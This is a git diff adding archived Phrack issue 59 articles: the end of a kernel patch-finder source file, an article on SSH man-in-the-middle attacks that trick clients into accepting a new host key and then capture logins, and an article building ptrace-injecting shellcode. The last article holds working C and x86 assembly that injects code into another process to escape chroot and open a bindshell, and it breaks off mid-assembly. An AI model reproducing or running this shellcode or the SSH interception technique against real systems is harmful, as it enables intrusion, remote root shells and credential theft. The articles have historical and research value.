+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#ifndef __LIBPF_H
+#define __LIBPF_H
+
+#include "module.h"
+
+int patchfinder(int what);
+
+#endif
+
+<--> ./patchfinder/libpf.h
+<++> ./patchfinder/libpf.c
+/*                                                            */
+/*            The Kernel PatchFinder version 0.9              */
+/*                                                            */
+/* (c) 2002 by Jan K. Rutkowski <jkrutkowski@elka.pw.edu.pl>  */
+/*                                                            */
+
+#include <asm/unistd.h>
+#include <errno.h> 
+#include "libpf.h"
+
+_syscall1(int, patchfinder, int, what)
+
+
+<--> ./patchfinder/libpf.c
+
+
+
diff --git a/phrack59/11.txt b/phrack59/11.txt
new file mode 100644
index 0000000..5915e48
--- /dev/null
+++ b/phrack59/11.txt
@@ -0,0 +1,289 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0b of 0x12
+
+
+|=-----------------=[ It cuts like a knife. SSHarp. ]=-------------------=|
+|=-----------------------------------------------------------------------=|
+|=----------------=[ stealth <stealth@segfault.net>  ]=------------------=|
+
+--[ Contents
+
+    - Intoduction
+
+  1 - Playing with the banner
+
+  2 - Playing with the keys
+
+  3 - Countermeasures
+
+  4 - An Implementation
+
+  5 - Discussion
+
+  6 - Acknowledgments
+
+  7 - References
+
+
+--[ Introduction
+
+The Secure Shell (SSH) protocol which itself is considered strong is often
+weakly implemented. Especially the SSH1/SSH2 interoperability as
+implemented in most SSH clients suffers from certain weak points as
+described below. Additionally the SSH2 protocol itself is also flexible
+enough to contain some interesting parts for attackers.
+
+For disclaimer see the pdf-version of this article available [here].
+
+  The described mim-program will be made available one week after releasing
+this article to give vendors time for fixes (which are rather trivial) to
+limit the possibility of abuse.
+
+  In this article I will describe how SSH clients can be tricked into
+thinking they are missing the host-key for the host they connected to even
+though they already have it in their list of known hosts. This is possible
+due to some points in the SSH drafts which makes life of SSH developers
+harder but which was ment to offer special protection or more flexibility.
+
+  I assume you have a basic understanding of how SSH works. However it is
+not necessary to understand it all in detail because the attacks succeeds
+in the handshake where only a few packets have been exchanged. I also
+assume you are familiar with the common attacking scenarios in networks
+like Man in the Middle attacks, hijacking attacks against plaintext
+protocols, replay attacks and so on.
+
+
+--[ 1 - Playing with the banner
+
+The SSH draft demands that both, client and server, exchange a banner
+before negotiating the key used for encrypting the communication channel.
+This is indeed needed for both sides to see which version of the protocol
+they have to speak. A banner commonly looks like
+
+
+  SSH-1.99-OpenSSH_2.2.0p1
+
+
+A client obtaining such a banner reads this as "speak SSH1 or SSH2 to me".
+This is due to the "1" after the dash, the so called remote major version.
+It allows the client to choose SSH1 for key negotiation and further
+encryption. However it is also possible for the client to continue with
+SSH2 packets as the "99" tells him which is also called the remote minor
+version. (It is a convention that a remote-minor version of 99 with a
+remote-major version of 1 means both protocols.)
+
+  Depending on the clients configuration files and command-line options he
+decides to choose one of both protocols. Assuming the user does not force a
+protocol with either of the "-1" or "-2" switch most clients should behave
+the same way. This is due to the configuration files which do not differ
+that much across the various SSH vendors and often contain the line
+
+
+  Protocol 1,2
+
+
+which makes the client choose SSH protocol version 1. It is obvious what
+follows now. Since the SSH client used to use SSH1 to talk to the server it
+is likely that he never spoke SSH2 before. This may be exploited by
+attackers to prompt a banner like
+
+
+  SSH-2.00-TESO-SSH
+
+
+to the client. The client looks up his database of known hosts and misses
+the host-key because it only finds the SSH1 key of the server which does
+not help much because according to the banner he is not allowed to speak
+SSH1 anymore (since the remote major version number is 2). Instead of
+presenting a warning like
+
+
+  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+  @    WARNING: REMOTE HOST IDENTIFICATION HAS CHANGED!     @
+  @@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
+  IT IS POSSIBLE THAT SOMEONE IS DOING SOMETHING NASTY!
+  Someone could be eavesdropping on you right now (man-in-the-middle attack)!
+  It is also possible that the RSA1 host key has just been changed.
+  The fingerprint for the RSA1 key sent by the remote host is
+  f3:cd:d9:fa:c4:c8:b2:3b:68:c5:38:4e:d4:b1:42:4f.
+  Please contact your system administrator.
+
+
+if someone tries MiM attacks against it without the banner-hack, it asks
+the user to just accept the new key:
+
+
+  Enabling compatibility mode for protocol 2.0
+  The authenticity of host 'lucifer (192.168.0.2)' can't be established.
+  DSA key fingerprint is ab:8a:18:15:67:04:18:34:ec:c9:ee:9b:89:b0:da:e6.
+  Are you sure you want to continue connecting (yes/no)?
+
+
+It is much easier now for the user to type "yes" instead of editing the
+known_hosts file and restarting the SSH client. Once accepted, the
+attackers SSH server would record the login and password and would forward
+the SSH connection so the user does not notice his account was just
+compromised.
+
+  The described attack is not just an upgrade attack. It also works to
+downgrade SSH2 speaking clients to SSH1. If the banner would contain "2.0"
+the client only spoke SSH2 to the original server and usually can not know
+the SSH1 key of the server because he does not speak SSH1 at all. However
+our MiM server speaks SSH1 and prompts the client once again with a key he
+cannot know.
+
+  This attack will not work for clients which just support one protocol
+(likely to be SSH1) because they only implement one of them. These clients
+should be very seldom and most if not all SSH clients support both
+versions, indeed it is even a marketing-pusher to support both versions.
+
+  If the client uses RSA authentication there is no way for the attacker to
+get in between since he cannot use the RSA challenges presented to him by
+the server because he is talking a different protocol to the client. In
+other words, the attacker is never speaking the same version of the
+protocol to both parties and thus cannot forward or intercept RSA
+authentication.
+
+  A sample MiM program (ssharp) which mounts the banner-hack and records
+logins can be found at [ssharp].
+
+
+--[ 2 - Playing with the keys
+
+It would be nice to have a similar attack against SSH without a version
+switch. This is because the version switch makes it impossible to break the
+RSA authentication.
+
+  Reading the SSH2 draft shows that SSH2 does not use the host-key for
+encryption anymore (as with SSH1 where the host and server-key was sent to
+the client which sent back the session-key encrypted with these keys).
+Instead the client obtains the host-key to check whether any of the
+exchanged packets have been tampered with by comparing the server sent MAC
+(Message Authentication Code; the server computes a hash of the packets
+exchanged and signs it using the negotiated algorithm) with his own
+computed hash. The SSH2 draft is flexible enough to offer more than just
+one static algorithm to allow MAC computation. Rather it specifies that
+during key exchange the client and the server exchange a list of preferred
+algorithms they use to ensure packet integrity. Commonly DSA and RSA are
+used:
+
+
+  stealth@liane:~> telnet 192.168.0.2 22
+  Trying 192.168.0.2...
+  Connected to 192.168.0.2.
+  Escape character is '^]'.
+  SSH-1.99-OpenSSH_2.2.0p1
+  SSH-2.0-client
+  `$es??%9?2?4D=?)??ydiffie-hellman-group1-sha1ssh-dss...
+
+
+I deleted a lot of characters and replaced it with "..." because the
+interesting part is the "ssh-dss" which denotes the servers favorite
+algorithm used for MAC computation. Clients connecting to 192.168.0.2
+cannot have a RSA key for computation because the server does not have one!
+Of course the attackers MiM program has a RSA key and offers only RSA to
+ensure integrity:
+
+
+  stealth@liane:~> telnet 192.168.0.2 22
+  Trying 192.168.0.2...
+  Connected to 192.168.0.2.
+  Escape character is '^]'.
+  SSH-2.0-OpenSSH_2.9p1
+  SSH-2.0-client
+  at      s?eu??>vM??E=diffie-hellman-group-exchange-sha1,
+  diffie-hellman-group1-sha1ssh-rsa...
+
+
+A SSH client connecting to our MiM server will once again prompt the user
+to accept the new key instead of issuing the MiM warning.
+
+  The MiM server connected to the original server and got to know that he
+is using DSA. He then decided to face the user with a RSA key. If the
+original server offers DSA and RSA the MiM server will wait until the
+client sends his preferred algorithms and will choose an algorithm the
+client is naming for his second choice. A RFC compliant SSH2 server has to
+choose the first algorithm he is supporting from the client list, our MiM
+server will choose the next one and thus produces a key-miss on
+client-side. This will again produce a yes/no prompt instead of the warning
+message. "ssharp" also supports this key-hack mode.
+
+
+--[ 3 - Countermeasures
+
+Having the RSA host-key for a server offering a DSA host-key means nothing
+for todays clients. They ignore the fact that they have a valid host-key
+for that host but in a different key-type. SSH clients should also issue
+the MiM warning if they find host-keys for the server where either the
+version or type does not match. Its very likely someone in playing MiM
+games. In my eyes it is definitely a bug in the SSH client software.
+
+
+--[ 4 - An Implementation
+
+There already exist some MiM implementations for SSH1 such as [dsniff] or
+[ettercap]. Usually they understand the SSH protocol and put much effort
+into packet assembling and reassembling or forwarding. Things are much
+simpler.  ssharp is based on a normal OpenSSH daemon which was modified to
+accept any login/password pair and starts a special shell for these
+connections: a SSH client which is given the username/password and the real
+destination IP. It logs into the remote host without user-interaction and
+since it is bound to the mim servers pty it looks for the user like he
+enters his normal shell. This way it is not needed to mess with SSH1 or
+SSH2 protocol or to replace keys etc. We just play with the banner or the
+signature algorithm negotiation the way described above.
+
+  If compiled with USE_MSS option enabled, ssharp will slip the SSH client
+through a screen-like session which allows attaching of third parties to
+existing (mimed) SSH1 or SSH2 connections. It is also possible to kick out
+the legitimate user and completely take control over the session.
+
+
+--[ 5 - Discussion
+
+I know I know; a lot of people will ask "thats all?" now. As with every
+discovery plenty of folks will claim that this is "standard UNIX semantics"
+or it is feature and not a bug or that the vulnerability is completely
+Theo...cal.  Neither of them is the case here, and the folks only looking
+for weaknesses in the crypto-algorithms such as key-stream-reuse and
+possibilities to inject 2^64 ;-) adaptive choosen plain-texts will
+hopefully acknowledge that crypto-analysis in 2002 welcomes laziness and
+misunderstanding of drafs on board. Laziness already broke Enigma, but next
+years will show how much impact it has when people are not able to
+completely understand protocols or put too much trust in crypto and do not
+think about the impact of violating the simple MUST in section
+1.1.70.3.3.1.9.78. of the super-crypto draft.
+
+
+--[ 6 - Acknowledgments
+
+Folks from the segfault dot net consortium ;-) for discussing and offering
+test environments. If you like to donate some hardware or money to these
+folks let me know. It would definitely help to let continue research on
+this and similar topics.
+
+ Also thanks to various other folks for discussing SSH with me.
+
+ This article is also available [here] as pdf paper with some screen-shots
+to demonstrate the power of ssharp.
+
+
+--[ 7. References
+
+[dsniff] as far as I know the first SSH1 MiM implementation "monkey in the
+         middle" part of dsniff package.
+         http://www.monkey.org/~dugsong/dsniff
+
+[ettercap] good sniffer/mim combo program for lazy hackers ;-)
+           http://ettercap.sourceforge.net
+
+[ssharp] an implementation of the attacks described in this article
+         http://stealth.7350.org/7350ssharp.tgz
+
+[here] this article as pdf with screenshots
+       http://stealth.7350.org/ssharp.pdf
+
+|=[ EOF ]=---------------------------------------------------------------=|
+
+
diff --git a/phrack59/12.txt b/phrack59/12.txt
new file mode 100644
index 0000000..f41373b
--- /dev/null
+++ b/phrack59/12.txt
@@ -0,0 +1,721 @@
+                             ==Phrack Inc.==
+
+               Volume 0x0b, Issue 0x3b, Phile #0x0c of 0x12
+
+|=---------------=[ Building ptrace injecting shellcodes ]=--------------=|
+|=-----------------------------------------------------------------------=|
+|=------------=[ anonymous author <p59_0c@author.phrack.org ]=-----------=|
+
+---[ Contents
+
+1 - Testing environment
+2 - Why we should do ptrace injecting shellcode ?
+3 - What does ptrace
+   3.1 - Requirement
+   3.2 - How does the library make the call
+4 - Injecting code in a process - C code
+   4.1 - The stack is our friend
+   4.2 - Code to inject
+   4.3 - Our first C code
+5 - First try to shellcodize it
+   5.1 When you need somebody to trace
+   5.2 Waiting (for love ?)
+   5.3 Registers where are you ?
+   5.4 Upload in progress
+   5.5 You'll be a man, my son.
+6 - References and greetings
+
+---[ 1 - Testing environment
+
+First of all, I've to set the rules for my playground. I used to test all
+these techniques under linux 2.4.18 i386 with executable stack. 
+They may work under any linux releases, excepted the nonexec-stack ones,
+due to the concept of the injection (On the stack).
+By modifying a little bit these techniques it shoud be possible to exploit
+any OS on any architecture, as long they support the ptrace() system call.
+
+---[ 2 - Why we should do ptrace injecting shellcode ?
+
+Starting in some of the 2.4.x kernel series, linux chroot is no longer
+breakable by the good old well known method.(using chroot() tricks).
+The linux chroot now really restricts the VFS usage, and a root shell on a
+chrooted process may (theorically) be unusable for a cracker, except by
+modifying (by example on a FTP server) the ftp tree.
+An uid of zero may allow the cracker to do some others things that are not
+restricted by the VFS on a standard 2.4 kernel :
+- Changing some kernel parameters (time of day, etc...).
+- Insert a kernel module (may be exploitable, but it is very hard to 
+include a shellcode due to space restriction. It had been used in a wuftpd
+2.5 exploit, by uploading a kernel backdoor and a staticaly linked insmod.
+That's way much complicated to do successfuly than our tricks. )
+- Somes VFS related thingies like using opens file descriptors.
+- Debug any process on the system.
+
+There is a huge vulnerability of the chroot system, which is corrected by
+some security patches available on the net. A root user in a chrooted env
+is still ptrace-capable on any process on the system (except init, 
+of course).
+This technique is also generic (doesn't use open fd's, may be usable even
+on non root processes) and a chrooted apache may infect fingerd as an
+exemple.
+
+Here comes the idea to create a ptrace shellcode. We may, with this 
+shellcode, trace an unrestricted process and inject into it a second 
+shellcode, which runs a bindshell in our example.
+Here is what we want for this ptrace shellcode :
+
+-Relative small size (must be usable as a real shellcode). I saw in some
+exploits (like the 7350wu one) a little smaller shellcode doing a read 
+(0,%esp,shellcode_len), and I thought it as a really "good-idea (TM)" to
+inject a big shellcode. So this parameter is not so critical.
+
+-Must be runable more than once in a short laps of time.
+If the first exploitation attempt failed (e.g. port already binded), the
+traced process must not crash. (in the wuftpd case, if we inject malicious
+code in inetd, it should let it listen for ftp connections)
+
+-The selection of the target process may be most of the time the parent 
+process (inetd for a ftp server) which usually has full root access. We 
+can also try all pid, starting from 2, until we find something traceable.
+
+-We can't lookup into /proc for any process to trace.
+
+These rules can be fulfilled, and are enough for most exploitation cases,
+I think. 
+
+---[ 3 - What does ptrace
+
+3.1 - Requirement
+
+You may know that the ptrace system call has been created for tracing and
+debugging process within usermode.
+A process may be ptraced by only one process at a time, and only by a pid
+owned by the same user, or by root.
+Under linux, ptrace commands are all implemented by the ptrace()
+function/syscall, with four parameters. The prototype is there :
+       #include <sys/ptrace.h>
+
+       long  int ptrace(enum __ptrace_request request, pid_t pid,
+       void * addr, void * data)
+
+'request' is a symbolic constant declared in sys/ptrace.h . We shall use
+those :
+
+PTRACE_ATTACH :
+	Attach to the process pid.
+
+PTRACE_DETACH :
+	ugh, Detach from the process pid. Never forget to do that, or
+	your traced process will stay in stopped mode, which is 
+	unrecoverable remotely.
+
+PTRACE_GETREGS :
+	This command copy the process registers into the struct 
+	pointed by data (addr is ignored). This structure is struct 
+	user_regs_struct defined as this, in asm/user.h :
+	struct user_regs_struct {
+	        long ebx, ecx, edx, esi, edi, ebp, eax;
+	        unsigned short ds, __ds, es, __es;
+	        unsigned short fs, __fs, gs, __gs;
+	        long orig_eax, eip;
+	        unsigned short cs, __cs;
+	        long eflags, esp;
+	        unsigned short ss, __ss;
+	};
+
+PTRACE_SETREGS :
+	This command has the opposite meaning of PTRACE_GETREGS, with
+	same arguments
+
+PTRACE_POKETEXT : 
+	This command copies 32 bits from the address pointed by data
+	in the addr address of the traced process. This is equivalent
+	to PTRACE_POKEDATA.
+
+An important thing when you attach a pid is that you have to wait for the
+traced process to be stopped, and so have to wait for the SIGCHLD 
+signal.
+wait(NULL) does this perfectly (implemented in the shellcode by waitpid).
+
+3.2 - How does the library make the call
+
+As we are writing asm code, we have to know how to call directly the
+ptrace system call. Little tests may show us the way the library uses to
+wrap the syscalls, and simply :
+eax is SYS_ptrace (26 decimal)
+ebx is request (e.g. PTRACE_ATTACH is 16)
+ecx is pid
+edx is addr
+esi is data
+in error case, -1 is stored in eax.
+
+---[ 4 - Injecting code in a process - C code
+
+4.1 - The stack is our friend
+
+I've seen some injection mechanism used by some ptrace() exploits for
+linux, which injected a standard shellcode into the memory area pointed
+by %eip. That's the lazy way of doing injection, since the target process
+is screwed up and can't be used again. (crashes or doesn't fork)
+We have to find another way to execute our code in the target process.
+That's what I was thinking and I found this :
+
+ 1- Get the current eip of the process, and the esp.
+ 2- Decrement esp by four
+ 3- Poke eip address at the esp address.
+ 4- Inject the shellcode into esp - 1024 address (Not directly 
+	before the space pointed by esp, because some shellcodes 
+	use the push instruction)
+ 5- Set register eip as the value of esp - 1024
+ 6- Invoke the SETREGS method of ptrace
+ 7- Detach the process and let it open a root shell for you :)
+
+The reason of non-usability on systems with nonexec stack is that the
+shellcode is uploaded onto the stack. That's a /feature/, not a bug.
+I've heard of methods saving the memory context of the traced process,
+uploading shellcode, wait it to finish (usually after the fork) and then
+restoring the old state of the traced process.
+That's a way, but I don't think it is really efficient because modern
+non-exec patches also avoid ptracing of unrestricted processes. (At least
+grsec does that.)
+
+The target stack may look as this :
+[DOWN][program stack][old_eip][craps for 1024 bytes][shellcode][UP]
+                     ^> Original esp points here        new eip<^
+                          new<^>esp points here
+Something important to do before the exploitation is to put two nops bytes
+before the shellcode. Reason is simple : if ptrace has interrupted a syscall
+being executed, the kernel will subtract two bytes from eip after the 
+PTRACE_DETACH to restart the syscall.
+
+   4.2 - Code to inject
+The code to inject has to work peacefully with the stack we have set up
+for it : it may fork(), and let the original process continue its job.
+The new process may launch a bindshell !
+Here's the code of s1.S , compilable with gcc :
+
+/* all that part has to be done into the injected process */
+/* in other word, this is the injected shellcode          */
+.globl injected_shellcode
+injected_shellcode:
+// ret location has been pushed previously
+nop
+nop
+pusha           // save before anything
+xor %eax,%eax
+mov $0x02,%al  //sys_fork
+int $0x80       //fork()
+xor %ebx,%ebx
+cmp %eax,%ebx   // father or son ?
+je  son         // I'm son
+//here, I'm the father, I've to restore my previous state
+father:
+popa
+ret /* return address has been pushed on the stack previously */
+// code finished for father
+
+son: /* standard shellcode, at your choice */
+.string ""
+
+local@darkside:~/dev/ptrace$ gcc -c s1.S
+Explanations :
+The first two nops are the nops I've discussed just before, because in my
+final shellcode I choose to decrement the destination buffer source 
+address by two.
+The pusha saves all the registers on the stack, so the process may restore
+them just after the fork. (I say eax and ebx)
+If the return value of fork is zero, this is the son being executed.
+There we insert any style of shellcode.
+If the return value is not zero (but a pid), restore the registers and the
+previously saved eip. The program may continue as if nothing has happened.
+
+   4.3 - Our first C code
+
+Lot of theory, now a little practical example. Here is a program which
+will fork, attach its son, inject it the code, let it run and after kill it.
+So, there is p2.c :
+#include <stdio.h>
+#include <sys/ptrace.h>
+#include <linux/user.h>
+#include <signal.h>
+typedef long int pid_t;
+
+void injected_shellcode();
+char *hello_shellcode=
+"\x31\xc0\xb0\x04\xeb\x0f\x31\xdb\x43\x59"
+"\x31\xd2\xb2\x0d\xcd\x80\xa1\x78\x56\x34"
+"\x12\xe8\xec\xff\xff\xff\x48\x65\x6c\x6c"
+"\x6f\x2c\x57\x6f\x72\x6c\x64\x20\x21" ;
+/* Prints hello. What a deal ! */
+
+char *shellcode;
+int child(){
+        while(1){
+                write(2,".",1);
+                sleep(1);
+                }
+        return 0;
+        }
+int father (pid_t pid){
+        int error;
+        int i=0;
+        int ptr;
+        int begin;
+        struct user_regs_struct data;
+        if (error=ptrace(PTRACE_ATTACH,pid,NULL,NULL))
+                perror("attach");
+        waitpid(pid,NULL,0);
+        if(error=ptrace(PTRACE_GETREGS,pid,&data,&data))
+                perror("getregs");
+        printf("%%eip : 0x%.8lx\n",data.eip);
+        printf("%%esp : 0x%.8lx\n",data.esp);
+
+        data.esp -= 4;
+        ptrace(PTRACE_POKETEXT,pid,data.esp,data.eip);
+
+        ptr=begin=data.esp-1024;
+        printf("Inserting shellcode into %.8lx\n",begin);
+        data.eip=(long)begin+2;
+        ptrace(PTRACE_SETREGS,pid,&data,&data);
+        while(i<strlen(shellcode)){
+                ptrace(PTRACE_POKETEXT,pid,ptr,(int)* (int *)
+(shellcode+i));
+                i+=4;
+                ptr+=4;
+                }
+        ptrace (PTRACE_DETACH,pid,NULL,NULL);
+        return 0;
+}
+int main(int argc,char **argv){
+        pid_t pid=0;
+        if(argc>1)
+                pid=atoi(argv[1]);
+        shellcode=malloc( strlen((char*) injected_shellcode) +
+                strlen(hello_shellcode) + 4);
+        strcpy(shellcode,(char *) injected_shellcode);
+        strcat(shellcode,(char *) hello_shellcode);
+        printf("p2 : trying to launch shellcode on forked process\n");
+        if(pid==0)
+        pid=fork();
+        if (pid){
+                printf("I'm the father\n");
+                sleep(2);
+                father(pid);
+                sleep(2);
+                kill(pid,9);
+                wait(NULL);
+        }else{
+                printf("I'm the child\n");
+                child();
+        }
+        return 0;
+}
+
+Compile all that with gcc -o p2 p2.c s1.S
+and admire my cut & paste skillz
+local@darkside:~/dev/ptrace$ ./p2
+p2 : trying to launch shellcode on forked process
+I'm the father
+I'm the child
+...%eip : 0x400c0a11
+%esp : 0xbffff470
+Inserting shellcode into bffff06c
+.Hello,World !.
+
+It really happened. the .... process forked and then printed 
+"Hello, world!".
+
+5 - First try to shellcodize it
+
+Before doing it, we have to remember our rules. I'll program it without
+really optimizing it in size (I let bighawk or pr1 do that) but designing
+with pre-compiler conditional assemble.
+gcc -DLONG for a very careful shellcode (checks etc...)
+gcc -DSHORT for a very tiny shellcode (which does the minimum but unsafe).
+
+So, if size really matters, we can exit(0) simply by jumping anywhere, or
+if size does not matter at all, we can make draconian tests.
+I will use at&t syntax, compilable with gcc.
+If you don't like it, a good (and big) awk script may do the trick.
+
+   5.1 When you need some body to trace
+
+A basic approach is first to set the stack pointer to a high value.
+We can't be certain that the stack pointer is not less than current eip
+(in the case of a stack based overflow).
+The easier (and laziest) way to do this is to set esp to 0xbffffe04.
+This esp value works on nearly all linux/x86 boxes I've seen, and is near
+the stack bottom, but not too much, and doesn't contain a zero.
+Then, we get the ppid process with the getppid() syscall. Next, first try
+to attach it.
+If the attach fails, 99% chances are that the ppid is init.
+In this case, we increment the pid until we can attach something.
+(Warning, debugging this part of code is not easy at all. When you trace 
+a process, you become its ppid. In this case, the shellcode will attach 
+your debugger and a mutual deadlock will appear. Who told "A cool/good 
+anti-debugger technique ?")
+So I included a test for the DEBUG_PID preprocessor variable.
+Put there whatever pid you want to inject something in.
+
+Note that the pid is put on the stack, at the 12(%ebp) place. That's 
+useful because we will need it in nearly all system calls.
+
+   5.2 Waiting (for love ?)
+
+Now, little shellcode has to wait for its child. There are two ways of 
+doing this :
+- waitpid(pid,NULL,NULL);
+- big big loop;
+
+As I didn't success to make a reasonably short (in time) loop smaller in
+size than the syscall, the code contains only the system call. 
+
+   5.3 Registers where are you ?
+
+The target process is ready to be modified, but the first thing to do with
+it is to extract the registers.
+The ebp register is saved into esi, and then esi is incremented by 16.
+It will be the "data" argument of the ptrace call.
+So, after the syscall, target registers are beginning at 16(%ebp).
+Interesting registers are :
+esp : 76(%ebp)
+eip : 64(%ebp)
+
+The register tricks I have described before are in the shellcode source, 
+but are not so complicated, including the "push"-like instruction to push
+the old eip address.
+
+   5.4 Upload in progress
+
+"Uploading" the shellcode, or injecting it in the target process, is just
+a little loop. The shellcode itself is not really clear because the loop
+counter used is esp.
+We set esp with the value specified in macro SHELLCODELEN. In edi, we set
+the memory address of the injected shellcode in the current process. Edx
+contains the target address, previously decremented of two conforming to
+our first note about this.
+
+As after the interrupt call, eax must be zero, we can safely use it to test
+if esp reached the final state.
+
+   5.5 You'll be a man, my son.
+
+We can safely detach the process now. If we forget to detach (laziness or
+simply spaceless) the process will remain in interrupted state, which
+needs a SIGCONT to launch our bindshell.
+After this hard work, shellcode can exit, simply by the exit() syscall 
+which usually doesn't alarm inetd or such and doesn't create any alarming
+note in syslog. (for the cute version, "ret" may be enough to segfault and
+so close the process.)
+
+The bindshell I included binds port 0x4141. Remember that two fast
+executions of the shellcode may block the port 0x4141 for minutes.
+That was quite annoying while coding this.
+
+The shellcode hasn't been optimized in size yet.
+You can compile the attached code with
+gcc -DLONG -c -o injector.o injector.S
+and linking it with your favourite exploit. Code is 100% null-chars free.
+I didn't look for newlines, carriage returns, spaces, percents, 0xff, 
+etc...
+
+---[ 6 - References and greetings
+
+Man page of ptrace() is cool, lucid, informative, and so on.
+
+Intel documentation book 2 : the instructions was an useful book
+full of 1-byte-instructions-which-does-everything.
+
+Special greets to the other guys from minithins.net, UNF people, my tender
+girlfriend and to at&t who made their own cool asm syntax.
+Special thanks too to the channels #fr,#ircs,#!w00nf,#segfault,#unf for
+their special support, and especially to double-p ,fozzy and OUAH who corrected
+my lame english and gave me some advices. 
+
+
+<injector.s>
+/* INJECTOR.S VERSION 1.0 */
+/* Injects a shellcode in a process using ptrace system call */
+/* Tested on : linux 2.4.18 */
+/* NOT SIZE-OPTIMIZED YET */
+
+
+#define SHELLCODELEN 30
+	/* That is, size of (the injected shellcode + bindshell)/4 */ 
+#ifndef SHORT
+	#define LONG
+#endif
+
+#ifdef LONG
+	#undef SHORT
+#endif
+.text
+.globl shellcode
+.type	 shellcode,@function
+
+shellcode:
+/* injector begins here */
+
+mov $0xbffffe04,%esp
+
+/* first thing, we have to find our ppid */
+xor %eax,%eax
+mov $64,%al	/* sys_getppid	*/
+int $0x80
+#ifdef DEBUG_PID
+	mov $DEBUG_PID,%ax
+#endif
+	/* put it on the stack */
+mov %esp,%ebp	/* save the stack in stack pointer */
+mov %eax,12(%ebp)	/* save the pid there */
+/* now we have to do a ptrace */
+redo:
+xor %eax,%eax
+mov $26,%al	/* sys_ptrace */
+mov 12(%ebp),%ecx
+mov %eax,%ebx
+mov $0x10,%bl	/* PTRACE_ATTACH */
+int $0x80	/* do ptrace(PTRACE_ATTACH,getppid(),NULL,NULL); */
+xor %ebx,%ebx
+cmp %eax,%ebx
+je good	/* we are not leet enough, or ppid is init	*/	
+inc %ecx
+mov %ecx,12(%ebp)
+jmp redo
+
+good:
+/* now we have to do a waitpid(pid,NULL,NULL)	*/
+mov %eax,%edx /* NULL */
+mov %ecx,%ebx /* pid */
+mov %edx,%ecx /* NULL */
+mov $7,%al /* SYS_waitpid */
+int $0x80
+
+getregs:
+/* now get its registers */
+xor %eax,%eax /* Should waitpid return 0 ? never ;) */
+xor %ebx,%ebx 
+mov %ebp,%esi   
+add $16,%esi	/* 16 up of the stack pointer */
+mov $12,%bl	/* %ebx is zero, PTRACE_GETREGS */
+mov 12(%ebp),%ecx /* pid */
+mov $26,%al	/* %eax is zero. */
+
+/* %edx doesn't contain anything since PTRACE_GETREGS doesn't use addr */
+int $0x80
+
+/* so now we have registers in 16(%ebp) */
+/* two interresting : %eip and %esp     */
+/* %eip : (16+48)(%ebp)			*/
+/* %esp : (16+60)(%ebp)			*/
+/* rq : 12(%ebx) contains ppid 		*/
+/* 8(%ebx) will contain the eip		*/
+
+custom_push:
+sub $4,76(%ebp)		/* dec the esp */
+mov 76(%ebp),%edi	/* put it in our temp eip */
+sub $1036,%di
+mov %edi,8(%ebp) /* that's the address where we */
+		/* shall start to install our code */
+/* we need to push the eip at top of the stack */
+
+mov $26,%al
+mov $4,%bl	/* PTRACE_POKETEXT*/
+mov 12(%ebp),%ecx /*ppid */
+mov 76(%ebp),%edx /* esp we have decremented */
+mov 64(%ebp),%esi /* old eip */
+int $0x80 /* what a work for push %eip */
+mov  %edi ,64(%ebp) /* eip = our code nah, %edi == 8(%ebp) */
+/* now put our cool registers set */
+
+setregs:
+xor %eax,%eax
+xor %ebx,%ebx
+mov $26,%al
+mov $13,%bl	/* PTRACE_SETREGS*/
+/* ppid always set so %ecx */
+/* %edx ignored */
+mov %ebp,%esi
+add $16,%esi
+int $0x80
+/* registers have been updated. now inject the shellcode */
+/* %edi : location in memory where we put the shellcode */
+
+jmp start
+goback: /* push on the stack the address of the shellcode to inject */
+
+mov %edi,%edx	/* addr */
+dec %edx
+dec %edx
+/* returning from syscall, eip goes 2 before current eip */
+/* with this trick, it goes on 2 nops */
+pop %edi	/* data */
+xor %eax,%eax
+mov $SHELLCODELEN,%al
+mov %eax,%esp
+mov $4,%bl
+
+loop:
+mov $26,%al
+mov 12(%ebp),%ecx
+mov (%edi),%esi
+int $0x80
+dec %esp
+add $4,%edx  /* target shellcode */
+add $4,%edi  /* local shellcode, source */ 
+cmp %esp,%eax  /* Len > 0 ? */
+jne loop    
+
+detach:
+mov $26,%al
+xor %ebx,%ebx
+mov $0x11,%bl	/* PTRACE_DETACH */
+mov 12(%ebp),%ecx	/* pid */
+//xor %edx,%edx
+//xor %esi,%esi
+int $0x80
+/* Now we can exit */
+
+failed:
+#ifdef LONG
+xor %eax,%eax		/* exit silently */
+mov %eax,%ebx
+mov $1,%al	/* sys_exit */
+int $0x80 	/* die in peace, poor child */
+#endif
+#ifndef LONG
+ret
+#endif
+
+start:
+call goback
+
+/* all that part has to be done into the injected process */
+/* in other word, this is the injected shellcode          */
+
+// ret location has been pushed previously
+nop
+nop
+pusha 		// save before anything by saving registers
+xor %eax,%eax
+mov $0x02,%al  //sys_fork
+int $0x80	//fork()
+xor %ebx,%ebx
+cmp %eax,%ebx	// father or son ?
+je  son		// I'm son
+//here, I'm the father, I've to restore my previous state
+father:
+popa
+ret
+/* code finished for the father */
+son: /* standard shellcode, at your choice */
+
+/* Bind shellcode */
+lnx_bind:
+xor %eax,%eax
+cdq /* %edx= 0 */
+push %edx /* IPPROTO_TCP */
+inc %edx		/* SOCK_STREAM */
+mov %edx,%ebx /* socket() */
+push %edx
+inc %edx		/* AF_INET */
+push %edx
+mov %esp,%ecx 
+
+mov $102,%al
+int $0x80
+
+mov %eax,%edi /* Save the socket in %edi */
+
+cdq /* %edx= sign of %eax = 0 */
+inc %ebx /* bind */ /* was 1, become 2 */
+push %edx /* 0.0.0.0 addr */
+/*change \/ here */
+push $0x4141ff02 /* here, change the 0x4141 for the port */
+/*       /\      */
+
+
+mov %esp,%esi /* save the address of sockaddr in %esi */
+push $16    /* Size of this shit */ //$16 
+push %esi /* struct sockaddr * */
+push %edi /* socket number */
+mov %esp,%ecx
+	/* bind() */
+mov $102,%al
+int $0x80
+
+/* Erf, I use the previous data on the stack, they are even good enough */
+inc %ebx /*3...*/
+inc %ebx /*4 */ 
+mov $102,%al
+int $0x80 /* Listen(fd,somehug) (somehuge always > 0 so it's good) */
+
+push %esp	/* Len */
+push %esi	/* sockaddr* */
+push %edi	/* socket */
+inc %ebx 	/* 5 */ 
+mov %esp,%ecx
+mov $102,%al
